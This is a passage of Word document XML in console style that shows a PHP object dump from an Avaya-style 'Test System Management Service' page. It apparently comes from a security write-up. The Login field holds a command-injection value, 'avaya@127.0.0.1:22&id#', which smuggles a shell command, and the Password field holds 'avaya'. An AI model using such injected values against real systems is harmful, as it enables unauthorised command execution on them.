          <w:p w14:paraId="54438921" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DF0A967" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="549FBC45" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_labelSuffix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F067378" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05887241" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_sms_record</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E93C8CE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="668B7295" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB79F9D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35730993" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19432771" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="404CE820" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       'slog' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6171F7CD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_pageError</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C3C6E0E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_formAction</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'submit',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6556EF38" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_defaultAction</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sms_test</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="532412FB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_formId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sms_test</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29F906A5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_title</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Test System Management Service',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5180AB27" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_helpContext</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5032CE62" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48246FED" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'type' =&gt; '-&gt;',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38E6A746" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03ABE98C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="752B4D6A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1945C622" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24CECC1D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  2 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C792C22" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F9EE5A6"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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sms_test.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DDCEE37" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'line' =&gt; 33,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FAB96D0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'function' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>processRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64C57371" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'class' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SAWController</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05EA93A4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'object' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="132EA909" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SMSTestController</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0017896D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_sms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21FFD532" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SMSTestModel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EA29449" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E1FBA0A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="523105D9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Login' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DBA252E"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9313D43" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Login',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61080E3A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D16AD93" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A0DA676" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 15,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38B7D057" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'CM Login ID',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EC05A6A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34599948" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'avaya@127.0.0.1:22&amp;id#',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C5A33E6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B85E91A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B4C6FAD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Password' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E650288"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41F0E93" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Password',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="367ED7EC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B2E4D41" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A568C41" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 15,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="654F8B0E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Password',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3796723A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21A8E241" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avaya</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66FCA084" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04A6DE0B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10A109AA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Model' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CFC850B"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4E88B902" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Model',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E2E5C8A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03A0F9AC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5196DF60" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 30,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24043FF1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Model',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5215C0C3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2790EC3B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>AARAnalysis</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DC362C7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
